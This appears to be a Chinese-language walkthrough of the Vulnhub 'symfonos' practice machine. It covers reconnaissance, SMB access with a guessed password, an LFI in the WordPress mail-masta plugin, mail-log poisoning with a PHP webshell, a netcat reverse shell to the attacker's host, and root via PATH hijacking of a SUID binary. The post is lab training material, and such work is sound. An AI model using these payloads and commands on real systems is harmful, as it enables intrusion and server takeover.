symfonos

日常练习

0x01 信息收集

老规矩，信息收集，用 nmap 扫。

192.168.56.3存活。因为80端口开着，浏览器打开看看。

页面上没有什么有价值的信息，于是尝试路径爆破。

dirsearch -u 192.168.56.3
[10:13:48] 301 -  313B  - /manual  ->  http://192.168.56.3/manual/
[10:13:48] 200 -  201B  - /manual/index.htm

扫到了个manual目录，应该是apache2的主页，到这里还是没有什么关键的信息。

于是想到的刚刚 nmap扫出来的端口还有445端口开放，尝试登陆smb。

0x02 SMB登录

在windows上键入\\192.168.56.3，就可以看到它开放的共享文件夹。

有两个目录，第二个需要账户密码，先看看第一个。

有一个attention.txt文件。内容如下：

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

主要是说不要用epidioko\qwerty\baseball，这三个字符串当账户密码，到这里可以猜测刚刚第二个文件夹，应该是用到了这三个密码中的其中一个，账户应该就是目录名 helios。

heliros
qwerty

经过尝试也是看到了目录下的一些文件。

research.txt文件下没有什么有用的，todo.txt的内容如下：

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

关键信息h3l105，这是网站的路径，访问看看

0x03 漏洞查找

这是一个WordPress搭建的博客网站（因为这里网站没搜集到什么信息），可以利用wpscan扫一下漏洞。因为网站与symfonos.local这个域名是有绑定的，所以需要去hosts文件里进行DNS绑定（具体这里就不阐述）。

wpscan --url http://symfonos.local/h3l105/

这里是借助kali用wpscan扫描，windows的环境没配置好先将就吧。

扫出来的结果里插件部分是有两个，mail-masta和site-editor，可以利用searchsploit来查找这两个插件的漏洞。
mail-masta

site-editor

先看看mail-masta这个插件的吧，他是存在LFI和SQL注入的，可以先试试LFI。

0x04 文件包含

将利用文件复制到当前目录下

searchsploit -m php/webapps/40290.txt

查看一下40290.txt文件（这里是直接把payload给粘贴过来了）

http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd 

尝试文件包含

成功了，看看能不能包含日志文件

pl=/var/log/apache2/error.log
pl=/var/log/apache2/access.log

发现都是没有内容的

正当没有头绪的时候突然想到一开始nmap扫到了一个25端口，于是百度后知道了可以利用邮件日志文件写入一句话木马。原理就是发送一份带有一句话木马的邮件，然后邮件日志文件就会记录下，再利用文件包含去包含邮件日志文件，就可以达到rce的效果。
邮件日志文件是在（因为用户名是helios）

pl=/var/mail/helios

包含成功！！

0x05 写入木马

那么要如何写入shell呢？利用telnet发送邮件telnet 192.168.56.3 25

然后粘贴如下文本

MAIL FROM: y2xsec
RCPT TO: helios
data
<?php system($_GET['cmd']); ?>
.
QUIT

ok，已经写入了，现在去网站试试能不能执行命令。

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=ls

因为页面不好看出来，这是源代码里面显示的内容。

发现是可以执行命令的，那么就可以尝试反弹shell。

0x06 反弹shell

在本地执行nc监听

nc -lvvp 2333

浏览器执行

symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc%20192.168.56.1%202333%20-e%20/bin/bash

成功反弹shell。

0x07 提升权限

可以看到当前的一个用户是heliros

查看一下有没有可以suid提权的命令

可以看到有一个可疑的可执行文件：statuscheck，执行看看

这应该是返回网页的一个状态情况，看看调用了什么命令

这里调用了curl命令，那么思路就有了：可以构造一个假的curl，然后利用statuscheck去调用假的curl，达到一个提权的效果。

cd /tmp
echo "/bin/bash" > curl
chmod 777 ./curl
export PATH=/tmp:$PATH
/opt/statuscheck

执行成功！！

看看/root目录下有什么

成功拿到flag，完结。

0x08 总结

学到很多东西，像可以往邮件日志里写入一句话木马，这个是没有想到的。

本栏目推荐文章
• vulnhub-DC-6
• vulnhub靶场渗透学习
• vulnhub-DC-5
• Lab 1-Vulnhub - Kioptix Level 1
• vulnhub-symfonos
• Vulnhub-Vulnos:2-WP
• Vulnhub-EVM-WP
• vulnhub-DC-4
• vulnhub Me and My Girlfriend靶场
• vulnhub DC-2靶场

vulnhub-symfonos symfonos vulnhubvulnhub-symfonos symfonos vulnhub vulnhub-symfonos symfonos vulnhub vulnhub_dc vulnhub-dc vulnhub-wp vulnhub-dc vulnhub dc vulnhub-bob vulnhub_sickos